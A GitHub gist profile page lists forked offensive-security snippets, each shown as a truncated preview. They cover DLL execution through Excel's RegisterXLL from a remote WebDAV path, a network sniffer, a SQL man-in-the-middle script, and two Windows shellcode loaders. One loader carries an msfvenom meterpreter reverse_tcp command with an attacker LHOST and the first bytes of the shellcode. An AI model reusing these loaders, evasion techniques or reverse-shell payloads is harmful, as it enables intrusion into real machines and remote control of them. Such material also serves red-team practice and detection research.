Skip to content

Instantly share code, notes, and snippets.

View an0x03e8's full-sized avatar

an0x03e8

7 followers · 86 following
View GitHub Profile
@an0x03e8
an0x03e8 / ExcelXLL.md
Created April 7, 2025 10:03 — forked from projectboot/ExcelXLL.md
Execute a DLL via .xll files and the Excel.Application object's RegisterXLL() method

DLL Execution via Excel.Application RegisterXLL() method

A DLL can be loaded and executed via Excel by initializing the Excel.Application COM object and passing a DLL to the RegisterXLL method. The DLL path does not need to be local, it can also be a UNC path that points to a remote WebDAV server.

When delivering via WebDAV, it should be noted that the DLL is still written to disk but the dropped file is not the one loaded in to the process. This is the case for any file downloaded via WebDAV, and they are stored at: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\TfsStore\Tfs_DAV\.

The RegisterXLL function expects an XLL add-in which is essentially a specially crafted DLL with specific exports. More info on XLL's can be found on MSDN

The XLL can also be executed by double-clicking the .xll file, however there is a security warning. @rxwx has more notes on this here inc

@an0x03e8
an0x03e8 / SilentListener.py
Created September 29, 2024 10:26 — forked from Dfte/SilentListener.py
import argparse
import ipaddress
from os import path
from time import sleep
from shlex import split
from scapy.all import sniff
from threading import Thread
from subprocess import Popen, PIPE
valid_ranges = []
@an0x03e8
an0x03e8 / sqlmitm.py
Created July 7, 2023 07:06 — forked from anonymous/sqlmitm.py
from scapy.all import *
import unicodedata
import sys, getopt
import time, datetime
import argparse
import socket
import fcntl
import struct
import threading
@an0x03e8
an0x03e8 / shellcode_exec_workerfactory.c
Created May 20, 2023 09:53 — forked from RistBS/shellcode_exec_workerfactory.c
Just another shellcode execution technique :)
#include <Windows.h>
#include <stdio.h>
#define PRINTDEBUG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)
#define WORKER_FACTORY_FULL_ACCESS 0xf00ff
typedef struct _UNICODE_STRING {
@an0x03e8
an0x03e8 / RtlRunOnceExecuteOnceShellcodeExec.c
Created April 7, 2023 11:29 — forked from paranoidninja/RtlRunOnceExecuteOnceShellcodeExec.c
Shellcode execution via RtlRunOnceExecuteOnce NtAPI
#include <windows.h>
#include <stdio.h>
extern WORD WINAPI RtlRunOnceExecuteOnce(RTL_RUN_ONCE *once, PRTL_RUN_ONCE_INIT_FN func, void *param, void **context);
typedef ULONG (WINAPI* RTL_RUN_ONCE_INIT_FN)(_Inout_ PRTL_RUN_ONCE RunOnce, _Inout_opt_ PVOID Parameter, _Inout_opt_ PVOID *Context);
// msfvenom LPORT=8080 LHOST=172.16.219.1 -p windows/x64/meterpreter/reverse_tcp -f c
unsigned char shellcode_bin[] =
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"